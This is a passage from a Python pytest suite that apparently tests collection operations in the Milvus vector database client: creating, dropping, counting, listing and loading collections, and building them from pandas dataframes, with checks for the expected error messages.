assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3, re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.STRING and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_string_field(self):
"""
target: test create with string field
method: create collection with string field
expected: Raise exception
"""
self._connect()
string_field = self.field_schema_wrap.init_field_schema(name="string", dtype=DataType.STRING)[0]
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, string_field, vec_field])
error = {ct.err_code: 0, ct.err_msg: "string data type not supported yet"}
self.collection_wrap.init_collection(name=cf.gen_unique_str(prefix), schema=schema,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_load_partition(self):
"""
target: test release the partition after load collection
method: load collection and load the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
partition_w1.load(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_partition(self):
"""
target: test release the partition after load collection
method: load collection and release the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'releasing the partition after load collection is not supported'}
partition_w1.release(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_release_collection(self):
"""
target: test release the collection after load collection
method: load collection and release the collection
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.insert(cf.gen_default_list_data())
collection_w.load()
collection_w.release()
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
# flush
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by empty dataframe
method: invalid dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_with_none_auto_id(self):
"""
target: test construct with non-int64 as primary field
method: non-int64 as primary field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and not insert ids(primary fields all values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection object is correct
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
# flush
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by num_entities attribute is equal to 0
expected: the count is equal to 0
"""
self._connect()
collection_w = self.init_collection_wrap()
assert collection_w.num_entities == 0
class TestCollectionCountIP(TestcaseBase):
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created(self, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling num_entities with correct params
expected: count_entities raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
data = cf.gen_default_list_data(insert_count, ct.default_dim)
collection_w.insert(data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
assert collection_w.num_entities == insert_count
class TestCollectionCountBinary(TestcaseBase):
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created_binary(self, insert_count):
"""
target: test num_entities, after index have been created
method: add vectors in db, and create binary index, then calling num_entities with correct params
expected: num_entities equals entities count just inserted
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(insert_count)
mutation_res, _ = collection_w.insert(data=df)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
assert collection_w.num_entities == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self):
"""
target: test collection num_entities is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by num_entities method is equal to 0
expected: the count is equal to 0
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
assert collection_w.num_entities == 0
class TestCollectionMultiCollections(TestcaseBase):
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by num_entities is equal to length of entities
expected: the count is equal to the length of entities
"""
self._connect()
data = cf.gen_default_list_data(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_w = self.init_collection_wrap(name=collection_name)
collection_w.insert(data)
collection_list.append(collection_name)
for i in range(collection_num):
res, _ = self.collection_wrap.init_collection(collection_list[i])
assert self.collection_wrap.num_entities == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
self._connect()
df, _ = cf.gen_default_binary_dataframe_data(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
mutation_res, _ = collection_w.insert(data=df)
collection_list.append(c_name)
for i in range(collection_num):
res, _ = self.collection_wrap.init_collection(collection_list[i])
assert self.collection_wrap.num_entities == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self):
"""
target: test collection rows_count is correct or not with multiple collections of
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
self._connect()
collection_list = []
collection_num = 20
data = cf.gen_default_list_data()
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_w = self.init_collection_wrap(name=collection_name)
collection_w.insert(data)
collection_list.append(collection_name)
for i in range(int(collection_num / 2), collection_num):
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
mutation_res, _ = collection_w.insert(data=df)
collection_list.append(c_name)
for i in range(collection_num):
res, _ = self.collection_wrap.init_collection(collection_list[i])
assert self.collection_wrap.num_entities == ct.default_nb
class TestCreateCollection(TestcaseBase):
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_multithread(self):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
self._connect()
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
self.init_collection_wrap(name=collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in self.utility_wrap.list_collections()[0]
class TestCreateCollectionInvalid(TestcaseBase):
"""
Test creating collections with invalid params
"""
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
limit_num = ct.max_field_num
field_schema_list = []
field_pr = cf.gen_int64_field(ct.default_int64_field_name, is_primary=True)
field_v = cf.gen_float_vec_field(ct.default_float_vec_field_name)
field_schema_list.append(field_pr)
field_schema_list.append(field_v)
for i in range(limit_num):
field_name_tmp = gen_unique_str("field_name")
field_schema_temp = cf.gen_int64_field(field_name_tmp)
field_schema_list.append(field_schema_temp)
error = {ct.err_code: 1, ct.err_msg: "'maximum field\'s number should be limited to 256'"}
schema, _ = self.collection_schema_wrap.init_collection_schema(fields=field_schema_list)
self.init_collection_wrap(name=c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
class TestDropCollection(TestcaseBase):
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_wr = self.init_collection_wrap(c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_wr.drop(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_not_existed(self):
"""
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
"""
self._connect()
c_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
c_name_2 = cf.gen_unique_str()
error = {ct.err_code: 0, ct.err_msg: 'DescribeCollection failed: can\'t find collection: %s' % c_name_2}
self.utility_wrap.drop_collection(c_name_2, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_create_drop_collection_multithread(self):
"""
target: test create and drop collection with multi-thread
method: create and drop collection using multi-thread,
expected: collections are created, and dropped
"""
self._connect()
threads_num = 8
threads = []
collection_names = []
def create():
c_name = cf.gen_unique_str()
collection_names.append(c_name)
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.drop()
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not self.utility_wrap.has_collection(item)[0]
class TestDropCollectionInvalid(TestcaseBase):
"""
Test drop collection with invalid params
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_drop_collection_with_invalid_collection_name(self, name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.utility_wrap.drop_collection(name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_empty_or_None_collection_name(self):
"""
target: test drop invalid collection
method: drop collection with empty or None collection name
expected: raise exception
"""
self._connect()
error = {ct.err_code: -1, ct.err_msg: '`collection_name` value is illegal'}
self.utility_wrap.drop_collection('', check_task=CheckTasks.err_res, check_items=error)
error_none = {ct.err_code: -1, ct.err_msg: '`collection_name` value None is illegal'}
self.utility_wrap.drop_collection(None, check_task=CheckTasks.err_res, check_items=error_none)
class TestHasCollection(TestcaseBase):
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_existed(self):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
self._connect()
threads_num = 4
threads = []
c_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
def has():
assert self.utility_wrap.has_collection(c_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_has_collection_with_invalid_collection_name(self, name):
"""
target: test list collections with invalid scenario
method: show collection with invalid collection name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.utility_wrap.has_collection(name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self):
"""
target: test list collections with invalid scenario
method: show collection with empty collection name
expected: raise exception
"""
self._connect()
error = {ct.err_code: -1, ct.err_msg: '`collection_name` value is illegal'}
self.utility_wrap.has_collection('', check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self):
"""
target: test list collections with invalid scenario
method: show collection with no collection name
expected: raise exception
"""
self._connect()
error = {ct.err_code: -1, ct.err_msg: '`collection_name` value None is illegal'}
self.utility_wrap.has_collection(None, check_task=CheckTasks.err_res, check_items=error)
class TestListCollections(TestcaseBase):
"""
******************************************************************
The following cases are used to test `utility.list_collections()` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
self._connect()
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = cf.gen_unique_str()
collection_names.append(collection_name)
self.init_collection_wrap(name=collection_name)
for i in range(collection_num):
assert collection_names[i] in self.utility_wrap.list_collections()[0]
self.utility_wrap.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
self._connect()
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.utility_wrap.list_collections(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self):
"""
target: test list collection with multi-threads
method: list collection using multi-threads
expected: list collections correctly
"""
self._connect()
threads_num = 10
threads = []
collection_name = cf.gen_unique_str()
self.init_collection_wrap(name=collection_name)
def _list():
assert collection_name in self.utility_wrap.list_collections()[0]
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection(TestcaseBase):
"""
******************************************************************
The following cases are used to test `collection.load()` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
self._connect()
collection_w = self.init_collection_wrap()
data = cf.gen_default_list_data()
collection_w.insert(data)
collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
index_name=ct.default_index_name)
collection_w.load()
collection_w.release()
@pytest.mark.tags(CaseLabel.L1)
def test_load_collection_after_index_binary(self):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
collection_w.load()
collection_w.release()
@pytest.mark.tags(CaseLabel.L2)
def test_load_empty_collection(self):
"""
target: test load an empty collection with no data inserted
method: no entities in collection, load and release the collection
expected: load and release successfully
"""
self._connect()
collection_w = self.init_collection_wrap()
collection_w.load()
collection_w.release()
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_wr = self.init_collection_wrap(c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_wr.load(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_wr = self.init_collection_wrap(c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_wr.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.drop()
error = {ct.err_code: 0,
ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
collection_wr.load(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str()
collection_wr = self.init_collection_wrap(name=c_name)
collection_wr.drop()
error = {ct.err_code: 0,
ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
collection_wr.release(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
